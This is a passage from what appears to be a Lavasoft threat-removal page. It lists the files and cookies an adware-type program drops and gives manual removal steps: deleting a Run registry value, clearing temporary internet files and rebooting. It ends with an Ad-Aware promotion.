    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
    %Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)
    C:\fhsli_6_12001.exe (1616 bytes)
    C:\114gglm_016.exe (1664 bytes)
    C:\xxdd_165.exe (30622 bytes)
    %Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
    %Program Files%\fhrl\info.db (120 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "wjime" = "%Program Files%\Wuji\Wuji.exe auto"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now